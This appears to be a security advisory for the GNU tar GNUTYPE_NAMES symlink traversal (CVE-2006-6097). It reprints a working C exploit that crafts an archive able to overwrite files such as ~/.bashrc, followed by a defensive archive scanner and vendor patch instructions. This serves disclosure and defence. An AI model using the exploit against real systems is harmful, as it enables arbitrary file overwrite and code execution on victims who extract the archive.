GNU Tar GNUTYPE_NAMES Remote Directory Traversal Vulnerability
Published: 2006-11-21
Updated: 2006-11-29
Affected systems:
GNU tar 1.16
GNU tar 1.15.1
Description:
BUGTRAQ ID: 21235
CVE(CAN) ID: CVE-2006-6097
GNU tar creates and extracts tar archives and performs a range of archive management tasks.
When GNU tar processes a GNUTYPE_NAMES record it does not validate the symbolic links the record instructs it to create. A remote attacker can exploit this to create or overwrite files at arbitrary locations on the victim's machine, with the privileges of the user running tar.
The extract_archive() function in extract.c and the extract_mangle() function in mangle.c handle GNUTYPE_NAMES records, whose data consists of name-mangling commands such as "Symlink". A crafted record can create a symlink (for example, to /) inside the extraction directory, and the entries that follow it in the archive are then written through that symlink. If a user is tricked into extracting such a tar file, arbitrary files are overwritten.
<*Source: Teemu Salmela (teemu.salmela@iki.fi)
Links: http://secunia.com/advisories/23115/
http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0344.html
http://marc.theaimsgroup.com/?l=bugtraq&m=116474353115287&w=2
http://lwn.net/Alerts/215097
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:26.gtar.asc
http://security.gentoo.org/glsa/glsa-200612-10.xml
http://www.debian.org/security/2006/dsa-1223
ftp://patches.sgi.com/support/free/security/advisories/20061202-01-P.asc
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
/*
 * tarxyz.c - GNU tar directory traversal exploit.
 * Written by Teemu Salmela.
 *
 * Example usage (creates a tar file that extracts /home/teemu/.bashrc):
 * $ gcc -o tarxyz tarxyz.c
 * $ ./tarxyz > ~/xyz.tar
 * $ mkdir -p /tmp/xyz/home/teemu/
 * $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc
 * $ cd /tmp
 * $ tar -rf ~/xyz.tar xyz/home/teemu
 *
 * The archive starts with a GNUTYPE_NAMES ('N') record whose data is the
 * mangle command "Symlink / to xyz". A vulnerable tar creates the symlink
 * xyz -> / while extracting, so the entries appended with tar -rf above are
 * written through it to /home/teemu/.bashrc.
 */
#define _GNU_SOURCE             /* asprintf() is a GNU extension */
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

/* POSIX ustar header; the comments give the byte offset of each field. */
struct posix_header
{                               /* byte offset */
  char name[100];               /*   0 */
  char mode[8];                 /* 100 */
  char uid[8];                  /* 108 */
  char gid[8];                  /* 116 */
  char size[12];                /* 124 */
  char mtime[12];               /* 136 */
  char chksum[8];               /* 148 */
  char typeflag;                /* 156 */
  char linkname[100];           /* 157 */
  char magic[6];                /* 257 */
  char version[2];              /* 263 */
  char uname[32];               /* 265 */
  char gname[32];               /* 297 */
  char devmajor[8];             /* 329 */
  char devminor[8];             /* 337 */
  char prefix[155];             /* 345 */
                                /* 500 */
};
#define GNUTYPE_NAMES 'N'       /* GNU "names" (mangle command) record */
#define BLOCKSIZE 512
union block
{
  char buffer[BLOCKSIZE];
  struct posix_header header;
};

/* Write size bytes from p to stdout, zero-padded to a whole number of blocks. */
void
data(void *p, size_t size)
{
  size_t n = 0;
  char b[BLOCKSIZE];
  while (size - n > 512) {
    fwrite(&((char *)p)[n], 1, 512, stdout);
    n += 512;
  }
  if (size - n) {
    memset(b, 0, sizeof(b));
    memcpy(b, &((char *)p)[n], size - n);
    fwrite(b, 1, sizeof(b), stdout);
  }
}

int
main(int argc, char *argv[])
{
  char *link_name = "xyz";
  union block b;
  char *d;
  size_t i;
  unsigned int cksum;

  /* Optional argument: name of the symlink created inside the extraction
   * directory. It must match the directory prefix of the appended entries. */
  if (argc > 1)
    link_name = argv[1];
  /* Mangle command carried out by extract_mangle(): "Symlink <target> to <name>". */
  if (asprintf(&d, "Symlink / to %s\n", link_name) < 0) {
    fprintf(stderr, "out of memory\n");
    exit(1);
  }
  memset(&b, 0, sizeof(b));
  strcpy(b.header.name, "xyz");
  strcpy(b.header.mode, "0000777");
  strcpy(b.header.uid, "0000000");
  strcpy(b.header.gid, "0000000");
  sprintf(b.header.size, "%011o", (unsigned int)strlen(d));
  strcpy(b.header.mtime, "00000000000");
  /* tar defines the checksum over a header whose chksum field is eight spaces. */
  memset(b.header.chksum, ' ', sizeof(b.header.chksum));
  b.header.typeflag = GNUTYPE_NAMES;
  /* Old GNU magic "ustar  \0" spans the magic and version fields. */
  memcpy(b.header.magic, "ustar ", sizeof(b.header.magic));
  memcpy(b.header.version, " ", sizeof(b.header.version));
  strcpy(b.header.uname, "root");
  strcpy(b.header.gname, "root");
  for (cksum = 0, i = 0; i < sizeof(b); i++)
    cksum += b.buffer[i] & 0xff;
  sprintf(b.header.chksum, "%06o ", cksum);
  fwrite(&b, 1, sizeof(b), stdout);
  data(d, strlen(d));
  free(d);
  return 0;
}
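The description and the PoC above show that the dangerous entry (xyz/home/teemu/.bashrc) carries no "../" or leading "/", so the usual path checks on archive members never fire; the only reliable signal is the GNUTYPE_NAMES record itself. The following scanner is an added example written for this page, not code from the advisory, from Teemu Salmela's PoC, or from the GNU tar project. It walks a tar image held in memory, verifies every header checksum, reports each 'N' record together with the Symlink/Rename mangle commands in its data, and also flags member names that are absolute or contain a ".." component. The archive it scans is constructed inline to mirror the PoC (function names scan_tar_image, build_sample_archive, make_header and scan_sample are this example's own):

```c
/* tar_names_scan.c: reject archives carrying GNUTYPE_NAMES ('N') records before
 * an old GNU tar ever sees them. Added example for this page, not code from the
 * advisory, the PoC or GNU tar; every function name here is this example's own. */
#include <stdio.h>
#include <string.h>

#define BLOCKSIZE 512
#define GNUTYPE_NAMES 'N'

/* Parse an octal header field of at most n bytes (NUL or space terminated). */
static unsigned long octal_field(const unsigned char *p, size_t n)
{
    unsigned long v = 0;
    while (n-- && *p >= '0' && *p <= '7')
        v = v * 8 + (unsigned long)(*p++ - '0');
    return v;
}

/* tar checksum: sum of the 512 header bytes with chksum (offset 148) taken as spaces. */
static unsigned long header_sum(const unsigned char *blk)
{
    unsigned long s = 0;
    for (size_t i = 0; i < BLOCKSIZE; i++)
        s += (i >= 148 && i < 156) ? ' ' : blk[i];
    return s;
}

/* An 'N' body is "Rename A to B" / "Symlink A to B" lines that extract_mangle()
 * carries out as written; report each one and return how many were seen. */
static int scan_mangle_data(const unsigned char *data, size_t len)
{
    const char *p = (const char *)data, *end = p + len, *nl;
    int found = 0;
    for (; p < end; p = nl ? nl + 1 : end) {
        size_t n = (nl = memchr(p, '\n', (size_t)(end - p))) ? (size_t)(nl - p) : (size_t)(end - p);
        if (n > 8 && (!strncmp(p, "Symlink ", 8) || !strncmp(p, "Rename ", 7)))
            printf("  mangle command #%d: %.*s\n", ++found, (int)n, p);
    }
    return found;
}

/* Walk a tar image in memory. Returns -1 on a corrupt header, otherwise one finding
 * per 'N' record, per mangle command inside it, and per absolute or ".." member name. */
int scan_tar_image(const unsigned char *buf, size_t len)
{
    static const unsigned char zero[BLOCKSIZE];
    int findings = 0;
    for (size_t off = 0; off + BLOCKSIZE <= len;) {
        const unsigned char *h = buf + off;
        char name[101];
        if (!memcmp(h, zero, BLOCKSIZE)) break;           /* end-of-archive marker */
        if (header_sum(h) != octal_field(h + 148, 8)) return -1;   /* corrupt header */
        size_t size = (size_t)octal_field(h + 124, 12);
        size_t nblocks = (size + BLOCKSIZE - 1) / BLOCKSIZE;
        if (nblocks > (len - off - BLOCKSIZE) / BLOCKSIZE) return -1;   /* data past end */
        memcpy(name, h, 100);
        name[100] = '\0';
        if (h[156] == GNUTYPE_NAMES) {
            printf("GNUTYPE_NAMES record '%s' (%zu data bytes)\n", name, size);
            findings += 1 + scan_mangle_data(h + BLOCKSIZE, size);
        } else if (name[0] == '/' || !strncmp(name, "../", 3) || strstr(name, "/../")) {
            printf("member escapes extraction root: %s\n", name);
            findings++;
        }
        off += BLOCKSIZE * (1 + nblocks);
    }
    return findings;
}

/* One header block laid out like the PoC's (constructed test data only). */
static void make_header(unsigned char *blk, const char *name, char type, size_t size)
{
    memset(blk, 0, BLOCKSIZE);
    snprintf((char *)blk, 100, "%s", name);
    snprintf((char *)blk + 124, 12, "%011lo", (unsigned long)size);
    blk[156] = type;
    memcpy(blk + 257, "ustar  ", 8);                      /* old GNU magic + version */
    snprintf((char *)blk + 148, 8, "%06lo", header_sum(blk));
    blk[155] = ' ';
}

/* Constructed sample: optionally the PoC's 'N' record ("Symlink / to xyz"), then the
 * benign-looking xyz/home/teemu/.bashrc, then the two zero end blocks.
 * out must hold 5 * BLOCKSIZE bytes; returns the image length. */
size_t build_sample_archive(unsigned char *out, int with_names_record)
{
    const char *cmd = "Symlink / to xyz\n";
    size_t off = 0;
    if (with_names_record) {
        make_header(out, "xyz", GNUTYPE_NAMES, strlen(cmd));
        memset(out + BLOCKSIZE, 0, BLOCKSIZE);
        memcpy(out + BLOCKSIZE, cmd, strlen(cmd));
        off = 2 * BLOCKSIZE;
    }
    make_header(out + off, "xyz/home/teemu/.bashrc", '0', 0);
    memset(out + off + BLOCKSIZE, 0, 2 * BLOCKSIZE);
    return off + 3 * BLOCKSIZE;
}

/* Build and scan a sample in one call; a non-zero result means "do not extract". */
int scan_sample(int with_names_record, int corrupt_first_byte)
{
    unsigned char img[5 * BLOCKSIZE];
    size_t n = build_sample_archive(img, with_names_record);
    if (corrupt_first_byte) img[0] ^= 1;               /* checksum no longer matches */
    return scan_tar_image(img, n);
}
```

Run against the PoC-style image, the scanner reports the 'N' record and its "Symlink / to xyz" command (two findings) while the .bashrc member passes the path check on its own; the same archive without the 'N' record yields no findings, and a header whose checksum does not match is rejected outright. No current GNU tar emits GNUTYPE_NAMES records when creating archives, so a gateway or extraction wrapper can treat any occurrence as hostile and refuse the archive rather than trying to interpret the mangle commands.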
Recommendation:
Vendor patches:
Debian
------
Debian has released security advisory DSA-1223-1 and the corresponding patches:
DSA-1223-1: New tar packages fix arbitrary file overwrite
Link: http://www.debian.org/security/2006/dsa-1223
Patch download:
Source archives:
http://security.debian.org/pool/updates/main/t/tar/tar_1.14.orig.tar.gz
Size/MD5 checksum: 1485633 3094544702b1affa32d969f0b6459663
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3.diff.gz
Size/MD5 checksum: 51004 d6513454cbe12eec5908c2b41253f843
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3.dsc
Size/MD5 checksum: 554 85503d4264d7b39c7969051c3661fa96
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_alpha.deb
Size/MD5 checksum: 520736 4b14a87c6e8b4dda327d802eddcf9af7
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_amd64.deb
Size/MD5 checksum: 503902 98a8169210eb273252a7997c726c4333
arm architecture (ARM)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_arm.deb
Size/MD5 checksum: 500266 49ef1817d4ee1753f66bd37be8f91455
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_hppa.deb
Size/MD5 checksum: 517810 5f48745a747ee36c330d97f3bc5cc980
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_i386.deb
Size/MD5 checksum: 499560 c764b0894f6c3317a78124177cfed9fe
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_ia64.deb
Size/MD5 checksum: 543432 0dc8b4d66a82d05d7b68f2dbee960791
m68k architecture (Motorola Mc680x0)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_m68k.deb
Size/MD5 checksum: 489058 381e468152e0a5a37113f412f13d85a7
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_mips.deb
Size/MD5 checksum: 520512 29bc4c6133bfeb259175fea45277a647
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_mipsel.deb
Size/MD5 checksum: 520258 ed3b0aadf8720c97a1df6334a90efe3c
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_powerpc.deb
Size/MD5 checksum: 506908 3a57a912dc159ee20d47ca1591a68619
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_s390.deb
Size/MD5 checksum: 511972 79cb92aaeee839c2d82efe743a8cea59
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_sparc.deb
Size/MD5 checksum: 499698 d260b9f5db00b12414d6136c63e37202
Patch installation:
1. Install the patch package manually:
First, download the patch with the following command:
# wget url (url is the patch download link)
Then install it with the following command:
# dpkg -i file.deb (file is the name of the corresponding patch package)
2. Install the patch package automatically with apt-get:
First, refresh the local package database:
# apt-get update
Then install the updated packages:
# apt-get upgrade
FreeBSD
-------
FreeBSD has released security advisory FreeBSD-SA-06:26 and the corresponding patch:
FreeBSD-SA-06:26: gtar name mangling symlink vulnerability
Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:26.gtar.asc
Patch download:
Perform one of the following steps:
1) Upgrade the vulnerable system to 4-STABLE or 5-STABLE, or to the RELENG_5_5 or RELENG_4_11 security branch dated after the correction date.
2) Patch the current system:
The following patch has been verified to apply to FreeBSD 4.11 and 5.5 systems.
a) Download the relevant patch from the location below and verify the detached PGP signature with your PGP utility.
# fetch http://security.FreeBSD.org/patches/SA-06:26/gtar.patch
# fetch http://security.FreeBSD.org/patches/SA-06:26/gtar.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/gnu/usr.bin/tar
# make obj && make depend && make && make install
GNU
---
The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:
http://www.gnu.org
RedHat
------
Red Hat has released security advisory RHSA-2006:0749-01 and the corresponding patch:
RHSA-2006:0749-01: Moderate: tar security update
Link: http://lwn.net/Alerts/215097
SGI
---
SGI has released security advisory 20061202-01-P and the corresponding patch:
20061202-01-P: SGI Advanced Linux Environment 3 Security Update #68
Link: ftp://patches.sgi.com/support/free/security/advisories/20061202-01-P.asc
Gentoo
------
Gentoo has released security advisory GLSA-200612-10 and the corresponding patch:
GLSA-200612-10: Tar: Directory traversal vulnerability
Link: http://security.gentoo.org/glsa/glsa-200612-10.xml
All Tar users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-arch/tar-1.16-r2"